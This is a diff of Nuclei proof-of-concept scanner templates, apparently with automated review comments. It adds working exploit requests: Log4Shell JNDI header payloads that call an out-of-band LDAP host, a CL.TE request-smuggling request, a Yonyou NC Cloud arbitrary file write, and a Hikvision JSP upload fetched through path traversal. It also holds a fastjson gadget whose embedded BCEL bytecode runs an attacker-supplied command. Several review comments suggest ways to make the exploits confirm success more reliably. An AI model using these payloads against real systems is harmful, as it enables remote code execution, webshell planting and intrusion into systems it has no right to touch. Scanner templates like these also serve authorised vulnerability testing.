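Review bot: `poc/favicon/favicon-generator.yaml` is a second copy of `poc/cve/CVE-2024-7568.yaml` from this same commit (same plugin, same Wordfence id `6eb3ad80-…`, same `<= 1.5` gate) with `description`, `cvss-metrics`, `cvss-score` and `cve-id` left empty and `shodan-query: 'vuln:'` truncated, yet it still carries `tags: cve,...`. Empty classification values may trip `nuclei -validate` and certainly give an operator nothing to triage on. Either delete this duplicate or fill the fields from the CVE template (`cve-id: CVE-2024-7568`, `cvss-score: 9.6` and its `C:H/I:H/A:H` vector, the description text).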
diff --git a/poc/header/header-footer-code.yaml b/poc/header/header-footer-code.yaml new file mode 100644 index 0000000000..0a7010be97 --- /dev/null +++ b/poc/header/header-footer-code.yaml @@ -0,0 +1,59 @@ +id: header-footer-code + +info: + name: > + NinjaTeam Header Footer Custom Code < 1.2 - Authenticated (Admin+) Stored Cross-Site Scripting + author: topscoder + severity: low + description: > + + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/3256da87-0d37-4c8f-9bac-95e3017e35d5?source=api-scan + classification: + cvss-metrics: + cvss-score: + cve-id: + metadata: + fofa-query: "wp-content/plugins/header-footer-code/" + google-query: inurl:"/wp-content/plugins/header-footer-code/" + shodan-query: 'vuln:' + tags: cve,wordpress,wp-plugin,header-footer-code,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/header-footer-code/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "header-footer-code" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.1') \ No newline at end of file diff --git a/poc/header/log4j-header.yaml b/poc/header/log4j-header.yaml index d0b090cb27..1d617fc7fd 100644 --- a/poc/header/log4j-header.yaml +++ b/poc/header/log4j-header.yaml 
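Review bot: The `name` says `< 1.2` but the gate is `compare_versions(version, '<= 1.1')`, which would not match a 1.1.x point release (a hypothetical `1.1.1`) that the title counts as vulnerable; use `compare_versions(version, '< 1.2')` so both agree. As with the favicon template in this commit, `description`, `cvss-metrics`, `cvss-score` and `cve-id` are empty and `shodan-query: 'vuln:'` is truncated while `tags` still claims `cve`; fill them from the cited Wordfence entry or drop the `cve` tag until there is an id to put there.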
@@ -1,23 +1,90 @@ id: log4j-fuzz-head-poc info: - name: log4j-fuzz-rce2 - author: rdnt + name: "Apache Log4j2 JNDI features do not protect against attacker controlled LDAP and other JNDI related endpoints" + description: | + Apache Log4j2 2.0-beta9 through 2.15.0 (excluding security releases 2.12.2, 2.12.3, and 2.3.1) JNDI features + used in configuration, log messages, and parameters do not protect against attacker controlled LDAP and other + JNDI related endpoints. An attacker who can control log messages or log message parameters can execute arbitrary + code loaded from LDAP servers when message lookup substitution is enabled. + From log4j 2.15.0, this behavior has been disabled by default. + From version 2.16.0 (along with 2.12.2, 2.12.3, and 2.3.1), this functionality has been completely removed. + Note that this vulnerability is specific to log4j-core and does not affect log4net, log4cxx, + or other Apache Logging Services projects. + author: xxx,topscoder severity: critical - tags: apache,rce + reference: + - https://logging.apache.org/log4j/2.x/security.html + - http://www.openwall.com/lists/oss-security/2021/12/10/1 + - http://www.openwall.com/lists/oss-security/2021/12/10/2 + - http://packetstormsecurity.com/files/165225/Apache-Log4j2-2.14.1-Remote-Code-Execution.html + - https://security.netapp.com/advisory/ntap-20211210-0007/ + - https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-apache-log4j-qRuKNEbd + - http://www.openwall.com/lists/oss-security/2021/12/10/3 + - https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2021-0032 + - https://www.oracle.com/security-alerts/alert-cve-2021-44228.html + - https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/VU57UJDCFIASIO35GC55JMKSRXJMCDFM/ + - http://www.openwall.com/lists/oss-security/2021/12/13/1 + - http://www.openwall.com/lists/oss-security/2021/12/13/2 + - https://twitter.com/kurtseifried/status/1469345530182455296 + - 
https://lists.debian.org/debian-lts-announce/2021/12/msg00007.html + - https://www.debian.org/security/2021/dsa-5020 + - https://cert-portal.siemens.com/productcert/pdf/ssa-661247.pdf + - http://packetstormsecurity.com/files/165270/Apache-Log4j2-2.14.1-Remote-Code-Execution.html + - http://packetstormsecurity.com/files/165260/VMware-Security-Advisory-2021-0028.html + - http://packetstormsecurity.com/files/165261/Apache-Log4j2-2.14.1-Information-Disclosure.html + - http://www.openwall.com/lists/oss-security/2021/12/14/4 + - https://www.intel.com/content/www/us/en/security-center/advisory/intel-sa-00646.html + - https://www.kb.cert.org/vuls/id/930724 + - http://packetstormsecurity.com/files/165282/Log4j-Payload-Generator.html + - http://packetstormsecurity.com/files/165281/Log4j2-Log4Shell-Regexes.html + - http://packetstormsecurity.com/files/165306/L4sh-Log4j-Remote-Code-Execution.html + - http://packetstormsecurity.com/files/165307/Log4j-Remote-Code-Execution-Word-Bypassing.html + - http://packetstormsecurity.com/files/165311/log4j-scan-Extensive-Scanner.html + - http://www.openwall.com/lists/oss-security/2021/12/15/3 + - https://cert-portal.siemens.com/productcert/pdf/ssa-714170.pdf + - https://msrc-blog.microsoft.com/2021/12/11/microsofts-response-to-cve-2021-44228-apache-log4j2/ + - https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-apache-log4j-qRuKNEbd + - https://cert-portal.siemens.com/productcert/pdf/ssa-479842.pdf + - http://packetstormsecurity.com/files/165371/VMware-Security-Advisory-2021-0028.4.html + - https://cert-portal.siemens.com/productcert/pdf/ssa-397453.pdf + - http://packetstormsecurity.com/files/165532/Log4Shell-HTTP-Header-Injection.html + - https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/M5CSVUNV4HWZZXGOKNSK6L7RPM7BOKIB/ + - https://github.com/cisagov/log4j-affected-db/blob/develop/SOFTWARE-LIST.md + - 
http://packetstormsecurity.com/files/165642/VMware-vCenter-Server-Unauthenticated-Log4Shell-JNDI-Injection-Remote-Code-Execution.html + - http://packetstormsecurity.com/files/165673/UniFi-Network-Application-Unauthenticated-Log4Shell-Remote-Code-Execution.html + - https://www.oracle.com/security-alerts/cpujan2022.html + - https://github.com/cisagov/log4j-affected-db + - https://www.bentley.com/en/common-vulnerability-exposure/be-2022-0001 + - https://support.apple.com/kb/HT213189 + - http://seclists.org/fulldisclosure/2022/Mar/23 + - https://www.oracle.com/security-alerts/cpuapr2022.html + - https://github.com/nu11secur1ty/CVE-mitre/tree/main/CVE-2021-44228 + - https://www.nu11secur1ty.com/2021/12/cve-2021-44228.html + - http://seclists.org/fulldisclosure/2022/Jul/11 + - http://packetstormsecurity.com/files/167794/Open-Xchange-App-Suite-7.10.x-Cross-Site-Scripting-Command-Injection.html + - http://packetstormsecurity.com/files/167917/MobileIron-Log4Shell-Remote-Command-Execution.html + - http://seclists.org/fulldisclosure/2022/Dec/2 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H + cvss-score: 10 + cve-id: CVE-2021-44228 + tags: apache,rce,log4j,critical,cve -requests: +http: - raw: - | GET / HTTP/1.1 Host: {{Hostname}} {{log4j_payloads}} + - | POST / HTTP/1.1 Host: {{Hostname}} {{log4j_payloads}} payloads: log4j_payloads: + - 'X-Client-IP: ${jndi:ldap://{{interactsh-url}}/info}' - 'X-Remote-IP: ${jndi:ldap://{{interactsh-url}}/info}' - 'X-Remote-Addr: ${jndi:ldap://{{interactsh-url}}/info}' @@ -200,7 +267,7 @@ requests: - 'Contact: ${${lower:jnd}${upper:i}: ${lower:ldap}://interactsh-url}' - 'X-Wap-Profile: ${${lower:jnd}${upper:i}: ${lower:ldap}://interactsh-url}' - 'X-Api-Version: ${${lower:jnd}${upper:i}: ${lower:ldap}://interactsh-url}' - + attack: clusterbomb matchers-condition: or matchers: 
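Review bot: The first hunk appends `X-Client-IP: ${jndi:ldap://{{interactsh-url}}/info}` to `log4j_payloads`, but the tail of that same list (visible as context in the next hunk: `Contact`, `X-Wap-Profile`, `X-Api-Version`) still reads `${lower:ldap}://interactsh-url}` — a literal hostname with no `{{ }}` — and appears to put a space after `${upper:i}:`, so those requests never reach the callback and can only produce false negatives; the commit does not touch them. Replace each with the templated form, e.g. `- 'X-Api-Version: ${${lower:jnd}${upper:i}:${lower:ldap}://{{interactsh-url}}/info}'`. The sixty-odd references are a raw NVD dump; the Apache advisory, the oss-security thread and the vendor advisories are enough, and `cvss-score: 10` is better written `10.0` to match the other templates in this repo.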
@@ -214,4 +281,6 @@ requests: part: interactsh_protocol name: dns words: - - "dns" \ No newline at end of file + - "dns" + +# Enhanced by topscoder 31.march.2023 \ No newline at end of file diff --git a/poc/http/cl-te-http-smuggling.yaml b/poc/http/cl-te-http-smuggling.yaml index ddb83e064d..278b84146d 100644 --- a/poc/http/cl-te-http-smuggling.yaml +++ b/poc/http/cl-te-http-smuggling.yaml @@ -1,37 +1,35 @@ -id: CL-TE-http-smuggling - -info: - name: HTTP request smuggling, basic CL.TE vulnerability - author: pdteam, akincibor - severity: Low - -http: - - raw: - - |+ - POST / HTTP/1.1 - Host: {{Hostname}} - Connection: keep-alive - Content-Type: application/x-www-form-urlencoded - Content-Length: 6 - Transfer-Encoding: chunked - - 0 - - G - - |+ - POST / HTTP/1.1 - Host: {{Hostname}} - Connection: keep-alive - Content-Type: application/x-www-form-urlencoded - Content-Length: 6 - Transfer-Encoding: chunked - - 0 - - G - - unsafe: true - matchers: - - type: dsl - dsl: - - 'contains(body, "Unrecognized method GPOST")' \ No newline at end of file +id: CL-TE-http-smuggling +info: + name: HTTP request smuggling, basic CL.TE vulnerability + author: pdteam, akincibor + severity: Low +requests: + - raw: + - | + POST / HTTP/1.1 + Host: {{Hostname}} + Connection: keep-alive + Content-Type: application/x-www-form-urlencoded + Content-Length: 6 + Transfer-Encoding: chunked + + 0 + + G + - |+ + POST / HTTP/1.1 + Host: {{Hostname}} + Connection: keep-alive + Content-Type: application/x-www-form-urlencoded + Content-Length: 6 + Transfer-Encoding: chunked + + 0 + + G + + unsafe: true + matchers: + - type: dsl + dsl: + - 'contains(body, "Unrecognized method GPOST")' diff --git a/poc/javascript/yonyou-nc-cloud-jsinvoke-rce.yaml b/poc/javascript/yonyou-nc-cloud-jsinvoke-rce.yaml index cef49f23fa..653783158e 100644 --- a/poc/javascript/yonyou-nc-cloud-jsinvoke-rce.yaml +++ b/poc/javascript/yonyou-nc-cloud-jsinvoke-rce.yaml 
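Review bot: The rewrite of `cl-te-http-smuggling.yaml` changes the first raw request's block scalar from `|+` to `|` while the second keeps `|+`; with `unsafe: true` and a hard `Content-Length: 6`, the trailing newlines after `G` are exactly the bytes that decide whether the back end sees `G` as the prefix of the following request, so the two supposedly identical requests now differ in the bytes that matter. Keep both as `|+` (or both `|-` if no trailing newline is the intent) and record why: `# keep the block-scalar chomping identical on both requests; CL=6 must cover exactly '0\r\n\r\nG'`. The hunk also moves the protocol key from `http:` back to the deprecated `requests:`, against the direction of the other templates in this commit, and since every line is removed and re-added it looks like a line-ending change too — worth confirming that was intentional.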
@@ -1,36 +1,43 @@ id: yonyou-nc-cloud-jsinvoke-rce info: - name: yonyou-nc-cloud-jsinvoke-rce - author: pphua + name: Yonyou NC Cloud - Remote Code Execution + author: Co5mos severity: critical - tags: yonyou,nc-cloud,rce - reference: - - https://mp.weixin.qq.com/s/-2fNt7rBj6j2inEmqIaoUA + description: An arbitrary file upload vulnerability in the Yonyou NC-Cloud system. Attackers can upload any files to the server and upload web shells, thereby gaining command execution privileges on the server. + reference: + - https://mp.weixin.qq.com/s/qL5LurGfuShf1emJuay2_Q metadata: max-request: 2 verified: true fofa-query: app="用友-NC-Cloud" + tags: yonyou,rce + +variables: + str1: "{{rand_base(5)}}.txt" http: - raw: - - | + - | POST /uapjs/jsinvoke/?action=invoke HTTP/1.1 Host: {{Hostname}} - User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0 + User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1) Accept: */* Content-Type: application/x-www-form-urlencoded - Accept-Encoding: gzip - {"serviceName":"nc.itf.iufo.IBaseSPService","methodName":"saveXStreamConfig","parameterTypes":["java.lang.Object","java.lang.String"],"parameters":["StringObject","webapps/nc_web/{{randstr}}.txt"]} - + {"serviceName":"nc.itf.iufo.IBaseSPService","methodName":"saveXStreamConfig","parameterTypes":["java.lang.Object","java.lang.String"],"parameters":["{{md5('yonyou-nc-cloud-jsinvoke-rce')}}","webapps/nc_web/{{str1}}"]} + - | - GET /{{randstr}}.txt HTTP/1.1 - Content-Length: 138 - User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0 + GET /{{str1}} HTTP/1.1 + Host: {{Hostname}} + matchers-condition: and matchers: - type: word + part: body words: - - "StringObject" - part: body \ No newline at end of file + - '5d8be7535d6383e99315739724e10fa7' + + - type: status + status: + - 200 \ No newline at end of file 
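Review bot: The matcher on the new side hard-codes `5d8be7535d6383e99315739724e10fa7`, which has to stay equal to the `{{md5('yonyou-nc-cloud-jsinvoke-rce')}}` sent in the first request; if either side is edited later the template silently stops matching. Derive both from one variable, e.g. `str2: "{{md5('yonyou-nc-cloud-jsinvoke-rce')}}"` next to `str1`, use `"{{str2}}"` in the JSON parameters and `contains(body, str2)` in a DSL matcher. The template also writes `webapps/nc_web/{{str1}}.txt` on the target and never removes it, so it should carry the `intrusive` tag as the Dahua template in this patch does.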
diff --git a/poc/microsoft/Hikvision_iVMS-8700_Fileupload_Files.yaml b/poc/microsoft/Hikvision_iVMS-8700_Fileupload_Files.yaml index 538f6fd6d5..e86e8491d1 100644 --- a/poc/microsoft/Hikvision_iVMS-8700_Fileupload_Files.yaml +++ b/poc/microsoft/Hikvision_iVMS-8700_Fileupload_Files.yaml @@ -1,20 +1,19 @@ id: HiKVISION info: - name: HiKVISION Comprehensive Security Management Platform Files Arbitrary File Upload Vulnerability + name: HiKVISION Comprehensive Security Management Platform Report Arbitrary File Upload Vulnerability author: Zero Trust Security Attack and Defense Laboratory severity: high description: | - HiKVISION comprehensive security management platform files interface has an arbitrary file upload vulnerability, allowing attackers to upload arbitrary files through the vulnerability + There is an arbitrary file upload vulnerability in the HiKVISION comprehensive security management platform report interface. Attackers can upload arbitrary files and obtain server privileges by constructing special request packets metadata: fofa-query: app="HIKVISION-综合安防管理平台" || title=="综合安防管理平台" hunter-query: web.icon="3670cbb1369332b296ce44a94b7dd685" - http: - raw: - | - POST /center/api/files;.html HTTP/1.1 + POST /svm/api/external/report HTTP/1.1 Host: {{Hostname}} Content-Type: multipart/form-data; boundary=----WebKitFormBoundary9PggsiM755PLa54a @@ -25,11 +24,17 @@ http: <%out.print("test");%> ------WebKitFormBoundary9PggsiM755PLa54a-- - + - | + GET /portal/ui/login/..;/..;/test.jsp HTTP/1.1 + Host: {{Hostname}} + User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.81 Safari/537.36 + req-condition: true matchers: - type: dsl dsl: - 'status_code_1 == 200' - - 'contains(body_1, "test.jsp")' + - 'contains(body_1, "data")' + - 'status_code_2 == 200' + - 'contains(body_2, "test")' condition: and 
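Review bot: In the second hunk the matcher `contains(body_2, "test")` is too weak to confirm execution: `test` also appears in the requested path `test.jsp`, which many error pages echo back, and `contains(body_1, "data")` will match almost any JSON response. Upload a random marker instead and check for it, e.g. `str1: '{{rand_base(6)}}'` under `variables`, `<%out.print("{{str1}}");%>` as the file body and `contains(body_2, str1)` in the DSL — the `upload_action` template in this same patch already follows that pattern. The JSP is fetched at a fixed name and nothing removes it afterwards, so the template should also be tagged `intrusive`. The multipart body of the first request starts before this hunk.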
diff --git a/poc/microsoft/Hikvision_iVMS-8700_upload.yaml b/poc/microsoft/Hikvision_iVMS-8700_upload.yaml index 7e328a8b1b..0ebd67934b 100644 --- a/poc/microsoft/Hikvision_iVMS-8700_upload.yaml +++ b/poc/microsoft/Hikvision_iVMS-8700_upload.yaml 
@@ -1,50 +1,27 @@ id: HIKVISION info: - name: HHIKVISION iVMS-8700 upload Webshell file - author: zerZero Trust Security Attack and Defense Laboratory + name: HIKVISION + author: Zero Trust Security Attack and Defense Laboratory severity: high description: | - HHIKVISION iVMS-8700 Comprehensive Security Management Platfor upload Webshell file + There is a command execution vulnerability in Hikvision's comprehensive security system. Hackers can execute system commands through the vulnerability metadata: - fofa-query: icon_hash="-911494769" - hunter-query: web.icon="3670cbb1369332b296ce44a94b7dd685" + fofa-query: app="HIKVISION-综合安防管理平台" + hunter-query: web.title="综合安防管理平台" -variables: - str0: '{{BaseURL}}/eps/api/resourceOperations/uploadsecretKeyIbuilding' - http: - raw: - | - POST /eps/api/resourceOperations/upload?token={{toupper(md5(str0))}} HTTP/1.1 + POST /bic/ssoService/v1/applyCT HTTP/1.1 Host: {{Hostname}} - User-Agent: Mozilla/5.0 (Android 3.2.5; Mobile; rv:51.0) Gecko/51.0 Firefox/51.0 - Accept-Encoding: gzip, deflate - Accept: */* - Connection: close - Content-Length: 184 - Content-Type: multipart/form-data; boundary=c4155aff43901a8b2a19a4641a5efa15 - - --c4155aff43901a8b2a19a4641a5efa15 - Content-Disposition: form-data; name="fileUploader"; filename="test.jsp" - Content-Type: image/jpeg - - {{randstr}} - --c4155aff43901a8b2a19a4641a5efa15-- - - - | - GET /eps/upload/{{name}}.jsp HTTP/1.1 - Host: {{Hostname}} - - extractors: - - type: json - name: name - json: - - ".data.resourceUuid" - internal: true + Content-Type: application/json + Testcmd: whoami + + {"CTGT": {"a": {"@type": "java.lang.Class", "val": "org.apache.tomcat.dbcp.dbcp2.BasicDataSource"}, "b": {"@type": "java.lang.Class", "val": "com.sun.org.apache.bcel.internal.util.ClassLoader"}, "c": {"@type": "org.apache.tomcat.dbcp.dbcp2.BasicDataSource", "driverClassLoader": {"@type": "com.sun.org.apache.bcel.internal.util.ClassLoader"}, "driverClassName": 
"$$BCEL$$$l$8b$I$A$A$A$A$A$A$A$a5Wyx$Ug$Z$ff$cd$5e3$3b$99$90dCB$W$uG$N$b09v$b7$a1$95B$c2$99$90$40J$S$u$hK$97P$db$c9$ec$q$3bd3$Tfg$J$a0$b6$k$d4$D$8fZ$8f$daPO$b4$ae$b7P$eb$s$U9$eaA$b1Z$8fzT$ad$d6zk$f1$f6$8f$da$f6$B$7c$bf$99$N$d9$84$ad$3c$3e$sy$be$f9$be$f7$7b$ef$f7$f7$be3y$fc$e2$p$a7$A$dc$80$7f$89$Q1$m$60P$84$PI$b6h$Cv$f3$Y$e2$91$f2$a3$E$c3$8c$a4$f30x$8c$88t$de$p$c2D$9a$JY$C2$ecr$_$8fQ$B$fb$E$ec$e7q$80$R$5e$c3$e3$b5$ec$f9$3a$R$d5$b8S$c4$5dx$3d$5b$de$m$e2$8dx$T$5b$O$K$b8$5bD7$de$cc$e3$z$ec$fcV$Bo$T$d1$84C$C$de$$$e0$j$3c$de$v$e0$5d$C$ee$R$f0n$k$f7$Kx$P$8f$f7$96$a0$B$efc$cb$fb$F$dc$t$e0$D$C$ee$e71$s$e00$T$bc$93$z$P$I$f8$a0$80$P$J$f8$b0$80$8f$88$f8$u$3e$c6$a8G$E$7c$5c$c0$t$E$3c$u$e0$93$C$b2$3c$3e$c5$e3$d3$o6$e03l$f9$ac$88$cf$e1$f3$o$d6$e3$L$C$be$c8$9eG$d9r$8c$89$3e$c4$7c$fc$S$d3$f4$b0$88$_$p$c7c$9c$83o$b5$a6k$d6Z$O$eeP$dd$z$i$3cmFB$e5P$d6$a5$e9jOf$b8_5$7b$e5$fe$UQ$fc$a3$a6f$a9$adFb$3f$879$a1$ae$dd$f2$5e9$9a$92$f5$c1$e8$d6$fe$dd$aab$b5$f4$b52$f1$d2$98$r$xC$dd$f2$88$zE$89$a4$U$da$b9$k$e2$m$b6$efS$d4$RK3$f44$H$ef$a0ju$90$c0$ca$o$aa$K$u1$cb$d4$f4$c1$96$ba$x$99xLPY8$I$ab$95$94$j$B$8f$e3$94$40$ca$_$r$97$c7$pd$_fdLE$ed$d0$98$fbe$bd$c6$b0$o$5b$edJ$d2$880$5d$Sz$b0$95C$ada$OF$e4$RYI$aa$R$cb$e6$88d$y$z$V$e9$cf$MDZ$f7$5bj$5b2$a3$PI8$81$afH8$89Sd$$$adZ$ec$82B$u$9b$f2$a9$z$r$a7$89$e2$eak$95p$gg$q$3c$8a$afr$u$9f$e94$87$8a$vR$a7n$a9$83$aa$c9$i$f9$g$8f$afK$f8$G$ceJx$M$e78$f0$Jc$H$cb$b6$84o2$3d$8bf$Y$ea1$ac$O$p$a3$t$$$e7$93C$rc$89$e8$9aa$7b$dd$9a$Z$YPM$w$e6$a8$v$8fpX8$r$dfc$c42J$b2$5b$b5$92$c6$94$b8$84$c7$f1$z$O$Lf$b2uhj$aa$90$eb$db8$c7$bc$7d$82R$_$e1$3b$f8$ae$84$ef$e1$fb$94v$JO$e2$H$S$7e$88$l$91$ebV$d2T$e5DZ$c2N$f4$91_$7d$F$95$eb$b5$afZ$q$fc$YO$91s$ea$3eU$91$f0$T$fc$94$f6I$cb$oG$7d$96l$S$$8$E$a6$84$b6gt$ddA$a0$cfJj$e9$da$eb$c8FR$d6$T$v$W$a0o0e$f4$cb$a9$7c$fc$8e$40AV$c4$R$d3P$d4t$da0$a98$b3l$WV$ddh$97$96$b6$q$fc$MO$b3$I$7eN$d07$d5$3d$iJ$c8$f4v5$3dB$f8dx$a7$d3fr$97$99$v$9f$JH$c2A$af$9a$b6TB$93$84_$e0$Zb$t$5c$Q$f6$ad$MY$f2$cb$89$c4$a4$u$cf$f8$94$e1$E$ed$8ctD$97$87$a9$v$7e$v$e1Y$fcJ$c2$afY$g$7
c$a3$9a$9e0F$e9$9e$b8$o$94$T$82QT$a1c$b4_$d3$a3$e9$q$j$c3$ca$qpl$efc$8a$ac$ebLw$cd$94$5b$db$9c$40$5b3Z$w$e1$60$ea7$S$7e$8b$df$f1$f8$bd$84$3f$e0$8f$8c$f2$tR$b5k$83$84$e7p$5e$c2$9f$f1$94$84$bf$e0$af$S$b6$p$s$e1o$f8$3b$8f$7fH$f8$tsi$9eb$MG$H$e4$b4$b5$3bm$e8$d1$bd$99Tt$aay$a8$f9$a7$ac$9a$ea$40$8a$60$j$b5$812$zMN$a9g$d4$3f$df$cc$U$db$80a$f6P$w8$y$J$fd$f7f$b7$f1N$S$r$ba$3a$da$a9$a7$zYWHjv$a8$c8$40$m$U$f5$c6$b7$b5S$aa$8a$c8WP57$aaJJ6$d5$84$83$7e$O$eb$8b$d8$ee$bbB$b6$d0$d2d$bc$8e$Gf1$d4$c9$a6$5e$cd$cb$b1Py5$7d$af1D$3e$af$w63$af$q$V$NL$m$ef$f3$p$a62T$y$3d$M$ac$93$W$cb$LB$cd$X$s$7c$95$yO$ab$p$a9$x$r$V$b1$cc$88j$w$8e$d1$aab$f2l$da$T$e87$u$Mx$9a$dd$a1$9e$d0NFv$db$3d$bc$b4H$c0E$a3$xU2$a6$a9$ea$d6$qf$a6W7$3f4$a8$7fI$abs$d8d$g$Z$9a$W$c1$o$7c$f6$VC$Y1$3b$I$9b$ae$ed2$E$F$c5$d0$zYc$af$a2y$85$8e$b6$re3$a6$ee$c9$a8$E$b4$96$ba$9d$USZ$3b$a0$dao$c7N$96$88$ce$a2$n$f0Z$ba$7dx$c4$dao$f3$ed$9c$3e0$f6$d3$9c$Yv$a6$Lu$v$r$95$b1$z$bdJE$$$fbYb$Z$5d$c6$a8j$b6$c9l$uU$87$8a$f4$TK$b9$97Z$c3$b4$98$83$85Z$f2S$a1e$da$7b$tOt$S$da$a9$8fdhnQ$ea$86$d9k$3d$_$ac$Z$d1$82$L$S$af$J$V$bd$60$96$a5LZ$dd$a8$a6$b4az_$d1LZ$f6$f2$81$V$O$_$d6$3b$ba$ba$cfr$b0$9d$7f$a1zBu$7d$ad$O$fa$f2$99$d2$Y$b9$sT$a8$60$ea$86t$cc$$F$t$9d$96$e1$98$c6b$fa$e2$R$c1$7e$3c$e0$d8$x$9f$d6mt$ba$86$9e$i$3d$bd$f5$e3$e0$8e$d1$86$c3$cd$b4$fa$i$o$89$d0T$84$8b$b1r$a3$f4$91$e8$r$ea$8b$B$d7$E$dc$3d$e1$i$3c$dd$e1$80$d7w$S$be$b8$3b$c0$c7$e2$9e$87$m$c4$e2$5e$b6$e6$e0o$f4$9e$84$Yw7$Q$dd$d9$9d$40I$dc$3d$O$89$Il$dbp$8a$ed$89$b3tG$7d$O$b3$Ce$k$5bQ$98$u$e5$f5$k$5b$a2$d1$be$cd$e2P$b3$t$Q$b0m$G$w$3d$93$e6$c8D$d8$937Al$ddWS$d2$fe$ff$x9F$99$A$M$faN$ae$b0$9f$e3$98M$U$96$af$b5$u$a3$b5$83$f2$b6$89$b2$b4$99h$9dt$bf$9d8o$82$85$z8$80$$$dcG$rx$98h$e3$94$fe$e3T$80$d3$94$d5$a7$89$f3$F$f4$d2$_0$H$ee$e7a$f2x$d5$f3$d8$c8$e3$96$L$d8$c0c$H$8f$5b$R$cfW$ad$8e$caA$l$TN9$f0$A$dcv9Vr$b6$d7$U$96$f8$m$aa$c3$N9TugQ$da$ec$a1$C$cd$e9$c9$5ez$ae$f11H$tP$jo$YG$cd$e9FO$O$c1F$S$98$7b$944$96$a2$92$be$e4$ab$f3A$y$87D$eb$O$3a$dd$K$9e$y$95b$X$dd$dfF$f7$afF$Nn$t$ac$dc$81EPP$8b$E$c2$Y$m$feA$db$f1$Kx$
$$80$e7$b1$8b$9c$ed$e1q$9b_$wpY$m$e1$3c$d8$dc$s$9dJ$A$d7$cd$ee$96$J$cc$cba$7e$e0$9a$J$y8$83$85$f4$d7$e5$5e3$bf$e1$d4$R$d7$f5$N$f3$97$f7$84$cf$ba$96$90$fb$8b$9a$3dAO$60q$O$d7$kvU$d1$ee$V$b4$hs$95$84$D$b5$q$d6$ec$Nz$l$c5$921$ee$a5$a07$b0$94$I$81el$J$d9WY$I$cd$be$y$f7$y$5d$d5$db$s$g$9a$7d$ee$V$7c$V$l$f4$jG$p$87$p$dc$a9$a0$af$8a$3f$8e$b0$L$cdBP$ID$f2$gY$fd$a3n$aa$3f$d5$3e$e8$a5$8dH$85o$f6$3b$X$d7$e5q$d3$U$b3o$3dyX7$c5$D$cb$c7q$3d$83$c8$Z41$9f$cfb$uH$89$be$e10$94$a0$9fI$be$d2$91tZ$a3$3c$e8$f7$5c$ee$88$K$9cc$7d$c0$e0$e5$b0$ae$f0N$g$89$7b$f2$96$fc$de$Z$96$e2d$c3$W$f1$b4$5c$cd$b3$hgz6$96$f7$ec$de$ff$c1$b3$c0$ca$J$ac$ca$a19$d0$c2$w$80$m$f5$7c$TY$5b$cd$5c$5cC$zO$dedQ$9d$a7$aee$d4u$O$b5Y$M$faO$60$7d$fc$E6$c4$83$e28Zsh$cba$e38$da$D$j9l$caas$O$9d$T$b8$89$e2$m$d7Jl$d7$c6P5w$M$VA$ff$E$b6$e4$d0$e50$Q$c5$97$85$ff$m$cfe$_$ae$9e$3c$b8$b8$ec$85$t$b2$f0la$8d$d9$D$99pYG$f0$earm$a5$a7$83$e9$p$I$d1$w$d0$c9O$cdZ$82$f9$84$f1E$84$ecZ$ccB$3d5$edZ$94S$dbV$90t$r$c9W$93$86$d9$84$ec$wh$84$f8$M$e6$e2$m$e6$e1$k$92$ba$9f$d0$7f$M$L$f0$M$W$e2$3c$Wq$d5X$ccu$e2Zn$L$96p$fb$b0$94$bb$h$cb$b8$a3$Iq$e7Q$e7$aa$40$bd$ab$92$90U$8b$88k9$9a$5c$x$b0$dc$b5$Ks$5d$eb$b0$c2$d5$86$h$5d$j$uqua$jy$b9$c6$b5$8d$feU$ed$b5$bb$ae$fc$o$aa9$k$L$b9K4$t$7c$f6$8e$c7$ed$3c$ee$a0$v$A$da$ca$d4d$b3x$f4s$X$f0$a4$3d$Yv$bc$84C$dby$uuR$c5$L$f0$bd$I$ef$r$g$3fn$5b$Q$f87$bc$ad$q$c3$e6y$82$d4$bb$a0$fe$H$d8$3e$ebc$Z$Q$A$A"}}} matchers: - type: word words: - - '{{randstr}}' + - "nt authority\\system" diff --git a/poc/microsoft/Hikvision_iVMS-8700_upload_action.yaml b/poc/microsoft/Hikvision_iVMS-8700_upload_action.yaml index 0ebd67934b..7f081b05e0 100644 --- a/poc/microsoft/Hikvision_iVMS-8700_upload_action.yaml +++ b/poc/microsoft/Hikvision_iVMS-8700_upload_action.yaml 
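Review bot: The new matcher only accepts `nt authority\system`, so a vulnerable host whose service runs under any other account (or on Linux, where `whoami` prints `root`) is reported as not vulnerable; since the command comes from the `Testcmd` header, prefer a deterministic marker such as `Testcmd: echo {{str1}}` with `str1: '{{rand_base(6)}}'` and `contains(body, str1)` if the gadget runs through a shell, or at least match `nt authority`, `root` and `uid=` with `condition: or`. The `driverClassName` value is an opaque `$$BCEL$$` blob (this looks like a fastjson `@type` gadget) that executes whatever class it encodes on the target; a comment stating what that class does — presumably run `Testcmd` and write its output into the response — and where the blob came from is needed so reviewers are not trusting bytecode blindly. The file is still named `..._upload.yaml` and `id: HIKVISION` is shared with the other Hikvision templates in this patch, which nuclei flags as duplicate ids; a unique id such as `hikvision-applyct-fastjson-rce` fixes both.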
